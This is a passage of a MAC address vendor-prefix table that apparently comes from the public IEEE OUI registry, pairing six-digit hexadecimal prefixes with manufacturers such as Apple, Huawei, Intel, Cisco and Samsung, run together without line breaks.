Apple, Inc. E0EB40 Apple, Inc. 64694E Texas Instruments 94D6DB NexFi B4ECF2 Shanghai Listent Medical Tech Co., Ltd. 18E777 vivo Mobile Communication Co., Ltd. 4077A9 New H3C Technologies Co., Ltd F83331 Texas Instruments C4954D IEEE Registration Authority C49878 SHANGHAI MOAAN INTELLIGENT TECHNOLOGY CO.,LTD 6C639C ARRIS Group, Inc. 5C2AEF r2p Asia-Pacific Pty Ltd A4BB6D Dell Inc. 6C06D6 Huawei Device Co., Ltd. 0C8E29 Arcadyan Corporation A0224E IEEE Registration Authority 3027CF Private 3843E5 Grotech Inc CC593E Sensium Healthcare Limited 5C68D0 Aurora Innovation Inc. 10364A Boston Dynamics 00B810 Yichip Microelectronics (Hangzhou) Co.,Ltd A4B239 Cisco Systems, Inc D8D5B9 Rainforest Automation, Inc. 001BB0 Bharat Electronics Limited 68AFFF Shanghai Cambricon Information Technology Co., Ltd. DC21E2 HUAWEI TECHNOLOGIES CO.,LTD FC1BD1 HUAWEI TECHNOLOGIES CO.,LTD 582575 HUAWEI TECHNOLOGIES CO.,LTD 28DEE5 HUAWEI TECHNOLOGIES CO.,LTD D01C3C TECNO MOBILE LIMITED 18C04D GIGA-BYTE TECHNOLOGY CO.,LTD. 8CAAB5 Espressif Inc. 402C76 IEEE Registration Authority 44C7FC Huawei Device Co., Ltd. 7885F4 Huawei Device Co., Ltd. F44955 MIMO TECH Co., Ltd. 0809C7 Zhuhai Unitech Power Technology Co., Ltd. 88541F Google, Inc. 900CC8 Google, Inc. 041DC7 zte corporation 68215F Edgecore Networks Corporation 3C28A6 Alcatel-Lucent Enterprise (China) 5050A4 Samsung Electronics Co.,Ltd 8086D9 Samsung Electronics Co.,Ltd F417B8 AirTies Wireless Networks 3CBF60 Apple, Inc. AC15F4 Apple, Inc. 386A77 Samsung Electronics Co.,Ltd 141459 Vodafone Italia S.p.A. 5043B9 OktoInform RUS 5C27D4 Shenzhen Qihu Intelligent Technology Company Limited 88A479 Apple, Inc. 047295 Apple, Inc. D446E1 Apple, Inc. 78D162 Apple, Inc. 08F8BC Apple, Inc. 90A25B Apple, Inc. 18300C Hisense Electric Co.,Ltd 44A56E NETGEAR 1C919D Dongguan Liesheng Electronic Co., Ltd. FCF29F China Mobile Iot Limited company F81F32 Motorola Mobility LLC, a Lenovo Company B00AD5 zte corporation 20114E MeteRSit S.R.L. 2C5741 Cisco Systems, Inc A84D4A Audiowise Technology Inc. 7894E8 Radio Bridge 484EFC ARRIS Group, Inc. B0B353 IEEE Registration Authority 547FBC iodyne 002674 Hunter Douglas FCE14F BRK Brands, Inc. 889655 Zitte corporation 1C97C5 Ynomia Pty Ltd 5CC1D7 Samsung Electronics Co.,Ltd 380146 SHENZHEN BILIAN ELECTRONIC CO.,LTD 98006A zte corporation 7CDFA1 Espressif Inc. F4A4D6 HUAWEI TECHNOLOGIES CO.,LTD 74B6B6 eero inc. 842E14 Silicon Laboratories 4410FE Huizhou Foryou General Electronics Co., Ltd. EC316D Hansgrohe EC97B2 SUMEC Machinery & Electric Co.,Ltd. 28FA7A Zhejiang Tmall Technology Co., Ltd. 08F458 Huawei Device Co., Ltd. 5CBA2C Hewlett Packard Enterprise 343794 Hamee Corp. 1005E1 Nokia 6CD94C vivo Mobile Communication Co., Ltd. AC1ED0 Temic Automotive Philippines Inc. 7CAB60 Apple, Inc. 44C65D Apple, Inc. 187EB9 Apple, Inc. 4CA64D Cisco Systems, Inc CC7F75 Cisco Systems, Inc 20E874 Apple, Inc. D03FAA Apple, Inc. 0CB937 Ubee Interactive Co., Limited DC35F1 Positivo Tecnologia S.A. D4DC09 Mist Systems, Inc. E8E98E SOLAR controls s.r.o. 0088BA NC&C 402B69 Kumho Electric Inc. 64F6BB Fibocom Wireless Inc. F47335 Logitech Far East 90ADFC Telechips, Inc. A4CFD2 Ubee Interactive Co., Limited A8A097 ScioTeq bvba BC1695 zte corporation A40801 Amazon Technologies Inc. 5CA62D Cisco Systems, Inc 345180 TCL King Electrical Appliances (Huizhou) Co., Ltd B8E3B1 HUAWEI TECHNOLOGIES CO.,LTD 980D51 Huawei Device Co., Ltd. 00ADD5 Huawei Device Co., Ltd. 3CB53D HUNAN GOKE MICROELECTRONICS CO.,LTD 2CEA7F Dell Inc. 086BD1 Shenzhen SuperElectron Technology Co.,Ltd. AC3A67 Cisco Systems, Inc 905D7C New H3C Technologies Co., Ltd 98FAA7 INNONET 487B5E SMT TELECOMM HK EC7949 FUJITSU LIMITED 00B7A8 Heinzinger electronic GmbH 30B216 ABB Power Grids Germany AG – Grid Automation D4D2D6 FN-LINK TECHNOLOGY LIMITED 105072 Sercomm Corporation. 285471 Huawei Device Co., Ltd. B88E82 Huawei Device Co., Ltd. DC333D Huawei Device Co., Ltd. 900A84 Mellanox Technologies, Inc. AC4A67 Cisco Systems, Inc 70CA97 Ruckus Wireless 000991 Intelligent Platforms, LLC. D8787F Ubee Interactive Co., Limited BCF310 Extreme Networks, Inc. C8665D Extreme Networks, Inc. E01C41 Extreme Networks, Inc. D854A2 Extreme Networks, Inc. D41D71 Palo Alto Networks 08661F Palo Alto Networks 0887C6 INGRAM MICRO SERVICES 785773 HUAWEI TECHNOLOGIES CO.,LTD AC6089 HUAWEI TECHNOLOGIES CO.,LTD 843E92 HUAWEI TECHNOLOGIES CO.,LTD 708CB6 HUAWEI TECHNOLOGIES CO.,LTD 50464A HUAWEI TECHNOLOGIES CO.,LTD C4A402 HUAWEI TECHNOLOGIES CO.,LTD 0015FF Novatel Wireless Solutions, Inc. 2880A2 Novatel Wireless Solutions, Inc. 9CBD6E DERA Co., Ltd 4C3329 Sweroam 488F5A Routerboard.com 100645 Sagemcom Broadband SAS 68332C KENSTEL NETWORKS LIMITED 145E45 Bamboo Systems Group AC67B2 Espressif Inc. 70617B Cisco Systems, Inc 985949 LUXOTTICA GROUP S.P.A. C489ED Solid Optics EU N.V. 58A87B Fitbit, Inc. 64E172 Shenzhen Qihoo Intelligent Technology Co.,Ltd 002438 Brocade Communications Systems LLC 748EF8 Brocade Communications Systems LLC 0027F8 Brocade Communications Systems LLC 50EB1A Brocade Communications Systems LLC F84DFC Hangzhou Hikvision Digital Technology Co.,Ltd. 849A40 Hangzhou Hikvision Digital Technology Co.,Ltd. 64E881 Aruba, a Hewlett Packard Enterprise Company D81FCC Brocade Communications Systems LLC 989D5D Technicolor CH USA Inc. 60F43A Edifier International 0014C9 Brocade Communications Systems LLC 5C6BD7 Foshan VIOMI Electric Appliance Technology Co. Ltd. 1848CA Murata Manufacturing Co., Ltd. 8022A7 NEC Platforms, Ltd. 5C2316 Squirrels Research Labs LLC 042144 Sunitec Enterprise Co.,Ltd 9880EE Samsung Electronics Co.,Ltd 90EEC7 Samsung Electronics Co.,Ltd 1029AB Samsung Electronics Co.,Ltd 184ECB Samsung Electronics Co.,Ltd A027B6 Samsung Electronics Co.,Ltd 103917 Samsung Electronics Co.,Ltd CC0DF2 Motorola Mobility LLC, a Lenovo Company A84025 Oxide Computer Company 94BF94 Juniper Networks 94434D Ciena Corporation B8804F Texas Instruments 0012E3 Agat Soft LLC 001351 Niles Audio Corporation 1065A3 Panamax LLC FCA5D0 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C85BA0 Shenzhen Qihu Intelligent Technology Company Limited E0BE03 Lite-On Network Communication (Dongguan) Limited 5C9012 Owl Cyber Defense Solutions, LLC 38F7CD IEEE Registration Authority 183CB7 Huawei Device Co., Ltd. 98CBA4 Benchmark Electronics A48873 Cisco Systems, Inc 04CB88 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 241407 Xiamen Sigmastar Technology Ltd. A06260 Private A4BDC4 HUAWEI TECHNOLOGIES CO.,LTD 5C9157 HUAWEI TECHNOLOGIES CO.,LTD 481693 Lear Corporation GmbH B47947 Nutanix 04F8F8 Edgecore Networks Corporation 5CFE9E Wiwynn Corporation Tainan Branch 881C95 ITEL MOBILE LIMITED F46942 ASKEY COMPUTER CORP 08E9F6 AMPAK Technology,Inc. F02E51 Casa Systems CCC261 IEEE Registration Authority 38F0C8 Mevo Inc. 7C7635 Intel Corporate 7470FD Intel Corporate 7C2A31 Intel Corporate B46BFC Intel Corporate 144F8A Intel Corporate C0B6F9 Intel Corporate 4456E2 Sichuan Tianyi Comheart Telecom Co., Ltd. 4CC95E Samsung Electronics Co.,Ltd 68ECC5 Intel Corporate A8913D Apple, Inc. 640BD7 Apple, Inc. 0C3B50 Apple, Inc. 34CFF6 Intel Corporate 782B46 Intel Corporate 347DF6 Intel Corporate CCD9AC Intel Corporate 9C2976 Intel Corporate 0C7A15 Intel Corporate 548D5A Intel Corporate B89A2A Intel Corporate 58961D Intel Corporate 74D83E Intel Corporate 08D23E Intel Corporate A87EEA Intel Corporate 40EC99 Intel Corporate BC542F Intel Corporate C87EA1 TCL MOKA International Limited 642C0F vivo Mobile Communication Co., Ltd. A0510B Intel Corporate DCFB48 Intel Corporate 84FDD1 Intel Corporate 4074E0 Intel Corporate 087190 Intel Corporate 5CCD5B Intel Corporate 98AF65 Intel Corporate 40A6B7 Intel Corporate 48A472 Intel Corporate D8F2CA Intel Corporate 48F17F Intel Corporate 3066D0 Huawei Device Co., Ltd. 3CB233 Huawei Device Co., Ltd. 209E79 Universal Electronics, Inc. 5CD5B5 Shenzhen WiSiYiLink Technology Co.,Ltd AC5FEA OnePlus Technology (Shenzhen) Co., Ltd 88948F Xi'an Zhisensor Technologies Co.,Ltd 044AC6 Aipon Electronics Co., Ltd C0FFA8 HUAWEI TECHNOLOGIES CO.,LTD C0517E Hangzhou Hikvision Digital Technology Co.,Ltd. FC1499 Aimore Acoustics Incorporation 189552 1MORE 98C7A4 Shenzhen HS Fiber Communication Equipment CO., LTD 0005C9 LG Innotek ACF108 LG Innotek 08ED9D TECNO MOBILE LIMITED 00BED5 New H3C Technologies Co., Ltd E86DCB Samsung Electronics Co.,Ltd 304950 IEEE Registration Authority 0CDC7E Espressif Inc. 2098D8 Shenzhen Yingdakang Technology CO., LTD 6032B1 TP-LINK TECHNOLOGIES CO.,LTD. 7CFD6B Xiaomi Communications Co Ltd 7CC77E Fiberhome Telecommunication Technologies Co.,LTD A0CFF5 zte corporation 1C012D Ficer Technology 3CA62F AVM Audiovisuelles Marketing und Computersysteme GmbH 98B3EF Huawei Device Co., Ltd. 50F958 Huawei Device Co., Ltd. 0002C4 OPT Machine Vision Tech Co., Ltd E41F7B Cisco Systems, Inc C0A36E BSkyB Ltd 8803E9 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 345840 HUAWEI TECHNOLOGIES CO.,LTD 5C647A HUAWEI TECHNOLOGIES CO.,LTD BC7F7B Huawei Device Co., Ltd. F0FAC7 Huawei Device Co., Ltd. DCEF80 HUAWEI TECHNOLOGIES CO.,LTD 182649 Intel Corporate B46F2D Wahoo Fitness 5C857E IEEE Registration Authority 089E01 Quanta Computer Inc. A81E84 Quanta Computer Inc. 646C80 CHONGQING FUGUI ELECTRONICS CO.,LTD. C01850 Quanta Computer Inc. 30CC21 zte corporation 4427F3 70mai Co.,Ltd. 047D7B Quanta Computer Inc. 0025DC Sumitomo Electric Industries, Ltd 846B48 ShenZhen EepuLink Co., Ltd. B460ED Beijing Xiaomi Mobile Software Co., Ltd D4F337 Xunison Ltd. 48A2B8 Chengdu Vision-Zenith Tech.Co,.Ltd 58E873 HANGZHOU DANGBEI NETWORK TECH.Co.,Ltd C0B8E6 Ruijie Networks Co.,LTD 8C941F Cisco Systems, Inc 687DB4 Cisco Systems, Inc DC41A9 Intel Corporate 088F2C Amber Technology Ltd. A83512 Huawei Device Co., Ltd. D4A651 HANGZHOU AIXIANGJI TECHNOLOGY CO., LTD 90F644 Huawei Device Co., Ltd. B030C8 Teal Drones, Inc. 44AF28 Intel Corporate 84225E SHENZHEN TECHNEWCHIP TECHNOLOGY CO.,LTD. F85C7D Shenzhen Honesty Electronics Co.,Ltd. A0681C GD Midea Air-Conditioning Equipment Co.,Ltd. A47CC9 HUAWEI TECHNOLOGIES CO.,LTD C40D96 HUAWEI TECHNOLOGIES CO.,LTD 6C442A HUAWEI TECHNOLOGIES CO.,LTD 842AFD HP Inc. 7412B3 CHONGQING FUGUI ELECTRONICS CO.,LTD. 9447B0 BEIJING ESWIN COMPUTING TECHNOLOGY CO., LTD E45AD4 Eltex Enterprise Ltd. CC483A Dell Inc. A4AE12 Hon Hai Precision Ind. Co., Ltd. 1CFE2B Amazon Technologies Inc. EC570D AFE Inc. 9C9D7E Beijing Xiaomi Mobile Software Co., Ltd DCA3A2 Feng mi(Beijing)technology co., LTD 7C25DA FN-LINK TECHNOLOGY LIMITED A8698C Oracle Corporation A4AC0F Huawei Device Co., Ltd. 5405DB LCFC(HeFei) Electronics Technology co., ltd CCFF90 Huawei Device Co., Ltd. D4D51B HUAWEI TECHNOLOGIES CO.,LTD 2491BB HUAWEI TECHNOLOGIES CO.,LTD 645E10 HUAWEI TECHNOLOGIES CO.,LTD ECF22B TECNO MOBILE LIMITED E45F01 Raspberry Pi Trading Ltd 44A54E Qorvo International Pte. Ltd. C8E600 HUAWEI TECHNOLOGIES CO.,LTD FCB3BC Intel Corporate 30578E eero inc. 003054 Castlenet Technology Inc. 784558 Ubiquiti Networks Inc. 848094 Meter, Inc. 10B3D5 Cisco Systems, Inc 30A2C2 Huawei Device Co., Ltd. DCDFD6 zte corporation ACA88E SHARP Corporation 98415C Nintendo Co.,Ltd F04F7C Private 705425 ARRIS Group, Inc. 5C0BCA Tunstall Nordic AB 283334 Huawei Device Co., Ltd. F0A225 Private 50A132 Shenzhen MiaoMingIntelligent Technology Co.,Ltd 807871 ASKEY COMPUTER CORP 4CB1CD Ruckus Wireless F49C12 Structab AB 88517A HMD Global Oy ACB3B5 HUAWEI TECHNOLOGIES CO.,LTD 083A88 Universal Global Scientific Industrial Co., Ltd. 08318B HUAWEI TECHNOLOGIES CO.,LTD F4B688 PLANTRONICS, INC. 4C7A48 Nippon Seiki (Europe) B.V. 84D15A TCT mobile ltd 047F0E Barrot Technology Limited B8F653 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 60AB14 LG Innotek BC62D2 Genexis International B.V. 6C9E7C Fiberhome Telecommunication Technologies Co.,LTD 44D5F2 IEEE Registration Authority 000C86 Cisco Systems, Inc F83CBF BOTATO ELECTRONICS SDN BHD FC589A Cisco Systems, Inc F08620 Arcadyan Corporation DCCC8D Integrated Device Technology (Malaysia) Sdn. Bhd. F05C77 Google, Inc. 111111 Private 6CD71F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F06865 Taicang T&W Electronics A463A1 Inventus Power Eletronica do Brasil LTDA 3C9D56 HUAWEI TECHNOLOGIES CO.,LTD 70FD45 HUAWEI TECHNOLOGIES CO.,LTD 446747 HUAWEI TECHNOLOGIES CO.,LTD 884A70 Wacom Co.,Ltd. F4B5BB CERAGON NETWORKS 507AC5 Apple, Inc. 4C6BE8 Apple, Inc. 8C861E Apple, Inc. 542B8D Apple, Inc. 001D29 Doro AB ECA5DE ONYX WIFI Inc 8C4962 Roku, Inc 1033BF Technicolor CH USA Inc. 347563 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 142E5E Sercomm Corporation. 0025CB Reiner SCT 44237C Beijing Xiaomi Mobile Software Co., Ltd C064E4 Cisco Systems, Inc 50804A Quectel Wireless Solutions Co., Ltd. 309435 vivo Mobile Communication Co., Ltd. D44BB6 Zhejiang Tmall Technology Co., Ltd. 38184C Sony Home Entertainment&Sound Products Inc D82FE6 Zhejiang Tmall Technology Co., Ltd. 140F42 Nokia 006D61 Guangzhou V-SOLUTION Electronic Technology Co., Ltd. C4AC59 Murata Manufacturing Co., Ltd. 5816D7 ALPS ELECTRIC CO., LTD. FCA47A IEEE Registration Authority E419C1 HUAWEI TECHNOLOGIES CO.,LTD B86685 Sagemcom Broadband SAS 381A52 Seiko Epson Corporation 000A17 NESTAR COMMUNICATIONS, INC D8AF81ZAO NPK Rotek E4FDA1 HUAWEI TECHNOLOGIES CO.,LTD B452A9 Texas Instruments 54EF44 Lumi United Technology Co., Ltd 402B50 ARRIS Group, Inc. 78CC2B SINEWY TECHNOLOGY CO., LTD B80756 Cisco Meraki D0C857 IEEE Registration Authority FCBCD1 HUAWEI TECHNOLOGIES CO.,LTD 7460FA HUAWEI TECHNOLOGIES CO.,LTD CC3ADF Private 38EFE3INGENICO TERMINALS SAS 50D4F7 TP-LINK TECHNOLOGIES CO.,LTD. 001F47 MCS Logic Inc. 8CFD18 HUAWEI TECHNOLOGIES CO.,LTD B45459 China Mobile (Hangzhou) Information Technology Co., Ltd. 000970 Vibration Research Corporation 14A2A0 Cisco Systems, Inc E4AB89 MitraStar Technology Corp. 78C313 China Mobile Group Device Co.,Ltd. 7434AE this is engineering Inc. 74ADB7 China Mobile Group Device Co.,Ltd. 6095CE IEEE Registration Authority 8CE5C0 Samsung Electronics Co.,Ltd F08A76 Samsung Electronics Co.,Ltd ECAA25 Samsung Electronics Co.,Ltd 687D6B Samsung Electronics Co.,Ltd 485169 Samsung Electronics Co.,Ltd C40683 HUAWEI TECHNOLOGIES CO.,LTD 94D00D HUAWEI TECHNOLOGIES CO.,LTD C48A5A JFCONTROL B49A95 Shenzhen Boomtech Industrial Corporation AC83E9 Beijing Zile Technology Co., Ltd D8CA06 Titan DataCenters France 1C20DB HUAWEI TECHNOLOGIES CO.,LTD D0C65B HUAWEI TECHNOLOGIES CO.,LTD 9078B2 Xiaomi Communications Co Ltd B4CFE0 Sichuan tianyi kanghe communications co., LTD BC7FA4 Xiaomi Communications Co Ltd FC492D Amazon Technologies Inc. 74EE2A SHENZHEN BILIAN ELECTRONIC CO.,LTD 087E64 Technicolor CH USA Inc. 080039 SPIDER SYSTEMS LIMITED 90473C China Mobile Group Device Co.,Ltd. 889E33 TCT mobile ltd 6C8AEC Nantong Coship Electronics Co., Ltd. 84C2E4 Jiangsu Qinheng Co., Ltd. 7C21D8 Shenzhen Think Will Communication Technology co., LTD. FCEA50 Integrated Device Technology (Malaysia) Sdn. Bhd. 00E06B W&G SPECIAL PRODUCTS 045C6C Juniper Networks D8F15B Espressif Inc. D4F057 Nintendo Co.,Ltd 6CF17E Zhejiang Uniview Technologies Co.,Ltd. 083A2F Guangzhou Juan Intelligent Tech Joint Stock Co.,Ltd 1C3A60 Ruckus Wireless D4351D Technicolor 6009C3 u-blox AG 488764 vivo Mobile Communication Co., Ltd. 5C1CB9 vivo Mobile Communication Co., Ltd. C0FD84 zte corporation 444B7E Fiberhome Telecommunication Technologies Co.,LTD DC8C37 Cisco Systems, Inc E8D0FC Liteon Technology Corporation E8E8B7 Murata Manufacturing Co., Ltd. 103D3E China Mobile Group Device Co.,Ltd. 7C50DA Private 64CC22 Arcadyan Corporation 4C9157 Fujian LANDI Commercial Equipment Co.,Ltd 9C25BE Wildlife Acoustics, Inc. D039EA NetApp F8DFE1 MyLight Systems 60D2DD Shenzhen Baitong Putian Technology Co.,Ltd. 788C77 LEXMARK INTERNATIONAL, INC. 3C0C7D Tiny Mesh AS 3476C5 I-O DATA DEVICE,INC. 24DA33 HUAWEI TECHNOLOGIES CO.,LTD FCAB90 HUAWEI TECHNOLOGIES CO.,LTD 5893D8 Texas Instruments 5051A9 Texas Instruments A4975C VTech Telecommunications Ltd. B02A1FWingtech Group (HongKong)Limited DC680C Hewlett Packard Enterprise F40270 Dell Inc. 1C2704 zte corporation 5078B3 zte corporation F0D4F7 varram system E0CC7A HUAWEI TECHNOLOGIES CO.,LTD 6C23CB Wattty Corporation 60AB67 Xiaomi Communications Co Ltd AC710C China Mobile Group Device Co.,Ltd. A8DB03 SAMSUNG ELECTRO-MECHANICS(THAILAND) 308944 DEVA Broadcast Ltd. F47960 HUAWEI TECHNOLOGIES CO.,LTD 145290 KNS Group LLC (YADRO Company) 5C32C5 Teracom Ltd. ACEE70 Fontem Ventures BV ACE2D3 Hewlett Packard 00FD22 Cisco Systems, Inc 4418FD Apple, Inc. 00B600 VOIM Co., Ltd. 98FA9B LCFC(HeFei) Electronics Technology co., ltd 005B94 Apple, Inc. E0897E Apple, Inc. B00CD1 Hewlett Packard 4846C1 FN-LINK TECHNOLOGY LIMITED B4D0A9 China Mobile Group Device Co.,Ltd. FC29F3 McPay Co.,LTD. F8AFDB Fiberhome Telecommunication Technologies Co.,LTD A0BD1D Zhejiang Dahua Technology Co., Ltd. E49F1E ARRIS Group, Inc. 002615 Teracom Limited 9C8EDC Teracom Limited 000191 SYRED Data Systems ACD564 CHONGQING FUGUI ELECTRONICS CO.,LTD. 94D075 CIS Crypto 28B4FB Sprocomm Technologies CO.,LTD. 40F9D5 Tecore Networks CC2C83 DarkMatter L.L.C DCED84 Haverford Systems Inc 7C573C Aruba, a Hewlett Packard Enterprise Company 2C01B5 Cisco Systems, Inc 28EF01 Private C05336 Beijing National Railway Research & Design Institute of Signal & Communication Group Co..Ltd. 606ED0 SEAL AG 2CCCE6 Skyworth Digital Technology(Shenzhen) Co.,Ltd E44CC7 IEEE Registration Authority D4E880 Cisco Systems, Inc A8346A Samsung Electronics Co.,Ltd 3C20F6 Samsung Electronics Co.,Ltd 7C38AD Samsung Electronics Co.,Ltd D49CDD AMPAK Technology,Inc. 50F722 Cisco Systems, Inc 9849E1 Boeing Defence Australia 04D7A5 New H3C Technologies Co., Ltd 4C4D66 Nanjing Jiahao Technology Co., Ltd. A4817A CIG SHANGHAI CO LTD 905851 Technicolor CH USA Inc. 9809CF OnePlus Technology (Shenzhen) Co., Ltd B8DE5E LONGCHEER TELECOMMUNICATION LIMITED 885A06 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5447D3 TSAT AS CCEDDC MitraStar Technology Corp. CCD81F Maipu Communication Technology Co.,Ltd. 688B0F China Mobile IOT Company Limited F82F6A ITEL MOBILE LIMITED B068E6 CHONGQING FUGUI ELECTRONICS CO.,LTD. A4E7E4 Connex GmbH B8EF8B SHENZHEN CANNICE TECHNOLOGY CO.,LTD B8186F ORIENTAL MOTOR CO., LTD. 001A3F Intelbras C0D834 xvtec ltd B8C253 Juniper Networks F05C19 Aruba, a Hewlett Packard Enterprise Company 04BD88 Aruba, a Hewlett Packard Enterprise Company 9C1C12 Aruba, a Hewlett Packard Enterprise Company 18DFB4 BOSUNG POWERTEC CO.,LTD. 000147 Zhone Technologies 20B780 Toshiba Visual Solutions Corporation Co.,Ltd E03717 Technicolor CH USA Inc. 14D4FE ARRIS Group, Inc. 304F75 DASAN Network Solutions ECA9FA GUANGDONG GENIUS TECHNOLOGY CO., LTD. 0003A5 Medea Corporation BCE67C Cambium Networks Limited 7C1E06 New H3C Technologies Co., Ltd F0B31E Universal Electronics, Inc. F89173 AEDLE SAS C84F86 Sophos Ltd 6429ED AO PKK Milandr 443C88 FICOSA MAROC INTERNATIONAL 841C70 zte corporation 544741 XCHENG HOLDING CCF735 Amazon Technologies Inc. C4F839 Actia Automotive C8F742 HangZhou Gubei Electronics Technology Co.,Ltd 006FF2 MITSUMI ELECTRIC CO.,LTD. 30DF8D SHENZHEN GONGJIN ELECTRONICS CO.,LT D4C93C Cisco Systems, Inc 78DD12 Arcadyan Corporation 2C5D34 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 9C1463 Zhejiang Dahua Technology Co., Ltd. 002433 ALPS ELECTRIC CO., LTD. 002306 ALPS ELECTRIC CO., LTD. B4EC02 ALPS ELECTRIC CO., LTD. 646038 Hirschmann Automation and Control GmbH 7018A7 Cisco Systems, Inc CCD39D IEEE Registration Authority E0750A ALPS ELECTRIC CO., LTD. 0019C1 ALPS ELECTRIC CO., LTD. 0016FE ALPS ELECTRIC CO., LTD. 9C8D7C ALPS ELECTRIC CO., LTD. D425CC IEEE Registration Authority 8C6DC4 Megapixel VR BC7536 ALPS ELECTRIC CO., LTD. E0AE5E ALPS ELECTRIC CO., LTD. D4B761 Sichuan AI-Link Technology Co., Ltd. 7C035E Xiaomi Communications Co Ltd 44FE3B Arcadyan Corporation D83AF5 Wideband Labs LLC 38D9A5 Mikotek Information Inc. 4C875D Bose Corporation B0E7DE Homa Technologies JSC 649D99 FS COM INC 00169D Cisco Systems, Inc 4C962D Fresh AB 00D279 VINGROUP JOINT STOCK COMPANY 484A30 George Robotics Limited 4861A3 Concern Axion JSC 304A26 Shenzhen Trolink Technology CO, LTD 4CE5AE Tianjin Beebox Intelligent Technology Co.,Ltd. E4D3AA FUJITSU CONNECTED TECHNOLOGIES LIMITED D467D3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A41232 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 48E3C3 JENOPTIK Advanced Systems GmbH CC355A SecuGen Corporation 80546A SHENZHEN GONGJIN ELECTRONICS CO.,LT B447F5 Earda Technologies co Ltd F4C7C8 Kelvin Inc. A89CA4 Furrion Limited 00004C NEC Corporation 8CCF8F ITC Systems 2875D8 FUJIAN STAR-NET COMMUNICATION CO.,LTD 90E202 Texas Instruments 302478 Sagemcom Broadband SAS 7C89C1 Palo Alto Networks 84A93E Hewlett Packard B0C387 GOEFER, Inc. 086BD7 Silicon Laboratories 349342 TTE Corporation 589EC6 Gigaset Communications GmbH 64C753 Apple, Inc. 6458AD China Mobile IOT Company Limited 1CF29A Google, Inc. 748A0D ARRIS Group, Inc. CC75E2 ARRIS Group, Inc. A0A3B8 WISCLOUD 38F9D3 Apple, Inc. FC183C Apple, Inc. A40C66 Shenzhen Colorful Yugong Technology and Development Co., Ltd. 4455B1 HUAWEI TECHNOLOGIES CO.,LTD 98F9C7 IEEE Registration Authority 700B4F Cisco Systems, Inc E4388C Digital Products Limited 184BDF Caavo Inc B89A9A Xin Shi Jia Technology (Beijing) Co.,Ltd 8C7BF0 Xufeng Development Limited E0A509 Bitmain Technologies Inc 3C5CC4 Amazon Technologies Inc. D8A756 Sagemcom Broadband SAS D8D6F3 Integrated Device Technology (Malaysia) Sdn. Bhd. 6C2CDC Skyworth Digital Technology(Shenzhen) Co.,Ltd 7835A0 Zurn Industries LLC F43909 Hewlett Packard 201F31 Inteno Broadband Technology AB 2CCC44 Sony Interactive Entertainment Inc. F47DEF Samsung Electronics Co.,Ltd 7C8BB5 Samsung Electronics Co.,Ltd 54833A Zyxel Communications Corporation 787052 Welotec GmbH D8A98B Texas Instruments 00116C Nanwang Multimedia Inc.,Ltd 10B9F7 Niko-Servodan 14EFCF SCHREDER 3830F9 LG Electronics (Mobile Communications) A83FA1 IEEE Registration Authority 7847E3 SICHUAN TIANYI COMHEART TELECOM CO.,LTD 6C9BC0 Chemoptics Inc. F4DBE6 Cisco Systems, Inc 248498 Beijing Jiaoda Microunion Tech.Co.,Ltd. C074AD Grandstream Networks, Inc. F095F1 Carl Zeiss AG 00F48D Liteon Technology Corporation 702ED9 Guangzhou Shiyuan Electronics Co., Ltd. 70192F HUAWEI TECHNOLOGIES CO.,LTD 10C22F China Entropy Co., Ltd. BC3865 JWCNETWORKS 04EB40 Cisco Systems, Inc 18A7F1 Qingdao Haier Technology Co.,Ltd 90E17B Apple, Inc. D81C79 Apple, Inc. 58E6BA Apple, Inc. 44E4EE Wistron Neweb Corporation DC41E5 Shenzhen Zhixin Data Service Co., Ltd. 00A5BF Cisco Systems, Inc C8BAE9 QDIS 1801F1 Xiaomi Communications Co Ltd C44F33 Espressif Inc. 546AD8 Elster Water Metering C0847D AMPAK Technology, Inc. 0409A5 HFR, Inc. 94917F ASKEY COMPUTER CORP 9C0CDF GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 242124 Nokia 949B2C Extreme Networks, Inc. 7CD30A INVENTEC CORPORATION 001E33 INVENTEC CORPORATION FC1D84 Autobase 18AC9E ITEL MOBILE LIMITED EC84B4 CIG SHANGHAI CO LTD 00D096 3COM EUROPE LTD 002654 3COM 0050DA 3COM 000476 3COM 000475 3COM 4422F1 S.FAC, INC 3009F9 IEEE Registration Authority B4DDD0 Continental Automotive Hungary Kft 48F027 Chengdu newifi Co.,Ltd 14C697 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7C03AB Xiaomi Communications Co Ltd DC16B2 HUAWEI TECHNOLOGIES CO.,LTD 24FB65 HUAWEI TECHNOLOGIES CO.,LTD 0CB527 HUAWEI TECHNOLOGIES CO.,LTD B42E99 GIGA-BYTE TECHNOLOGY CO.,LTD. 342CC4 Compal Broadband Networks, Inc. 14E9B2 Fiberhome Telecommunication Technologies Co.,LTD C8544B Zyxel Communications Corporation D07FA0 Samsung Electronics Co.,Ltd 009093 EIZO Corporation 4C1159 Vision Information & Communications 00049F Freescale Semiconductor 00D07B COMCAM INTERNATIONAL INC 78524A Ensenso GmbH E4FC82 Juniper Networks 00B5D0 Samsung Electronics Co.,Ltd 1496E5 Samsung Electronics Co.,Ltd C46E7B SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. C048FB Shenzhen JingHanDa Electronics Co.Ltd 20E882 zte corporation F09FFC SHARP Corporation 0CB5DE Alcatel Lucent 000B3B devolo AG 240588 Google, Inc. 50DCFC ECOCOM 700B01 Sagemcom Broadband SAS 5C2623 WaveLynx Technologies Corporation 303855 Nokia Corporation 00B670 Cisco Systems, Inc AC6417 Siemens AG 347916 HUAWEI TECHNOLOGIES CO.,LTD 3466EA VERTU INTERNATIONAL CORPORATION LIMITED 28385C FLEXTRONICS 0C1C57 Texas Instruments 806FB0 Texas Instruments 883F99 Siemens AG EC6F0B FADU, Inc. 0006EC Harris Corporation 7C6DA6 Superwave Group LLC D016B4 HUAWEI TECHNOLOGIES CO.,LTD 20A8B9 SIEMENS AG F0F08F Nextek Solutions Pte Ltd 8CB0E9 